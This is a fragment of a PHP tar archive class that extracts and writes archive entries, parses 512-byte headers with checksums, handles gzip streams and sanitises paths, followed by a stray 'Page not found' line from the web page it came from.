				while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1);

				if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename'];
				else $header['filename'] = $path.'/'.$header['filename'];

			}

			if (file_exists($header['filename'])){

				if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){

					$this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder');
					return false;
				}

				if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){

					$this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists');

					return false;

				}

				if (!is_writeable($header['filename'])){
					$this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists');

					return false;

				}

			} elseif (($this->checkDirectory(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){

				$this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename'];

				return false;
			}

			if ($header['typeflag'] == '5'){

				if (!file_exists($header['filename']))		{

					if (!mkdir($header['filename'], 0777))	{


						$this->errors[] = __('Cannot create directory').' '.$header['filename'];
						return false;
					} 
				}
			} else {
				if (($destination = fopen($header['filename'], 'wb')) == 0) {

					$this->errors[] = __('Cannot write to file').' '.$header['filename'];

					return false;
				} else {

					$decr = floor($header['size']/512);

					for ($i = 0; $i < $decr; $i++) {

						$content = $this->readDataBlock();

						fwrite($destination, $content, 512);

					}

					if (($header['size'] % 512) != 0) {
						$content = $this->readDataBlock();
						fwrite($destination, $content, ($header['size'] % 512));

					}

					fclose($destination);

					touch($header['filename'], $header['time']);

				}

				clearstatcache();

				if (filesize($header['filename']) != $header['size']) {

					$this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect');

					return false;

				}

			}

			if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = '';
			if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/';

			$this->dirs[] = $file_dir;

			$this->files[] = $header['filename'];


		}
		return true;

	}


	
function checkDirectory($dir){


		$parent_dir = dirname($dir);

		if ((@is_dir($dir)) or ($dir == ''))

			return true;


		if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->checkDirectory($parent_dir)))
			return false;


		if (!mkdir($dir, 0777)){
			$this->errors[] = __('Cannot create directory').' '.$dir;

			return false;
		}
		return true;

	}



	
function parseHeader($binaryData, &$header){


		if (strlen($binaryData)==0){

			$header['filename'] = '';
			return true;
		}


		if (strlen($binaryData) != 512){
			$header['filename'] = '';

			$this->__('Invalid block size').': '.strlen($binaryData);

			return false;
		}

		$checksum = 0;
		for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1));
		for ($i = 148; $i < 156; $i++) $checksum += ord(' ');

		for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1));


		$unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData);


		$header['checksum'] = OctDec(trim($unpack_data['checksum']));

		if ($header['checksum'] != $checksum){

			$header['filename'] = '';
			if (($checksum == 256) && ($header['checksum'] == 0)) 	return true;
			$this->errors[] = __('Error checksum for file ').$unpack_data['filename'];
			return false;

		}



		if (($header['typeflag'] = $unpack_data['typeflag']) == '5')	$header['size'] = 0;
		$header['filename'] = trim($unpack_data['filename']);
		$header['mode'] = OctDec(trim($unpack_data['mode']));
		$header['user_id'] = OctDec(trim($unpack_data['user_id']));
		$header['group_id'] = OctDec(trim($unpack_data['group_id']));

		$header['size'] = OctDec(trim($unpack_data['size']));
		$header['time'] = OctDec(trim($unpack_data['time']));

		return true;

	}


	
function writeFileHeader($filename, $keep_filename){


		$packF = 'a100a8a8a8a12A12';
		$packL = 'a1a100a6a2a32a32a8a8a155a12';

		if (strlen($keep_filename)<=0) $keep_filename = $filename;

		$filename_ready = $this->sanitizePath($keep_filename);


		if (strlen($filename_ready) > 99){							//write long header
		$dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0);

		$dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', '');

                                                    //  Calculate the checksum

		$checksum = 0;
                                                    //  First part of the header
		for ($i = 0; $i < 148; $i++)

			$checksum += ord(substr($dataFirst, $i, 1));
                                                    //  Ignore the checksum value and replace it by ' ' (space)
		for ($i = 148; $i < 156; $i++)

			$checksum += ord(' ');

                                                    //  Last part of the header
		for ($i = 156, $j=0; $i < 512; $i++, $j++)
			$checksum += ord(substr($dataLast, $j, 1));

                                                    //  Write the first 148 bytes of the header in the archive

		$this->writeDataBlock($dataFirst, 148);
                                                    //  Write the calculated checksum

		$checksum = sprintf('%6s ', DecOct($checksum));
		$binaryData = pack('a8', $checksum);
		$this->writeDataBlock($binaryData, 8);
                                                    //  Write the last 356 bytes of the header in the archive
		$this->writeDataBlock($dataLast, 356);


		$tmp_filename = $this->sanitizePath($filename_ready);


		$i = 0;
			while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){

				$binaryData = pack('a512', $buffer);

				$this->writeDataBlock($binaryData);
			}

		return true;
		}

		$file_info = stat($filename);

		if (@is_dir($filename)){

			$typeflag = '5';
			$size = sprintf('%11s ', DecOct(0));
		} else {
			$typeflag = '';

			clearstatcache();
			$size = sprintf('%11s ', DecOct(filesize($filename)));
		}

		$dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename))));

		$dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', '');

		$checksum = 0;
		for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1));

		for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
		for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1));

		$this->writeDataBlock($dataFirst, 148);

		$checksum = sprintf('%6s ', DecOct($checksum));

		$binaryData = pack('a8', $checksum);
		$this->writeDataBlock($binaryData, 8);

		$this->writeDataBlock($dataLast, 356);
		return true;

	}



	
function openFileForWriting(){


		if ($this->isGzipped)
			$this->tmp_file = gzopen($this->archive_name, 'wb9f');
		else
			$this->tmp_file = fopen($this->archive_name, 'wb');


		if (!($this->tmp_file)){

			$this->errors[] = __('Cannot write to file').' '.$this->archive_name;

			return false;

		}

		return true;
	}


	
function readDataBlock(){



		if (is_resource($this->tmp_file)){
			if ($this->isGzipped)

				$block = gzread($this->tmp_file, 512);

			else
				$block = fread($this->tmp_file, 512);

		} else	$block = '';


		return $block;

	}


	

function writeDataBlock($data, $length = 0){

		if (is_resource($this->tmp_file)){


			if ($length === 0){
				if ($this->isGzipped)
					gzputs($this->tmp_file, $data);
				else

					fputs($this->tmp_file, $data);
			} else {
				if ($this->isGzipped)

					gzputs($this->tmp_file, $data, $length);
				else

					fputs($this->tmp_file, $data, $length);
			}
		}
	}

	
function closeTemporaryFile(){



		if (is_resource($this->tmp_file)){
			if ($this->isGzipped)
				gzclose($this->tmp_file);
			else

				fclose($this->tmp_file);


			$this->tmp_file = 0;
		}
	}


	

function sanitizePath($path){



		if (strlen($path)>0){

			$path = str_replace('\\', '/', $path);
			$partPath = explode('/', $path);

			$els = count($partPath)-1;
			for ($i = $els; $i>=0; $i--){

				if ($partPath[$i] == '.'){
                                                                                                                                  //  Ignore this directory

                                                                                                        } elseif ($partPath[$i] == '..'){

                                                                                                                                  $i--;
                                                                                                        }

				elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){
                                                                                                        }	else
					$result = $partPath[$i].($i!=$els ? '/'.$result : '');

			}

		} else $result = '';



		return $result;
	}
}
?>
Page not found – Hello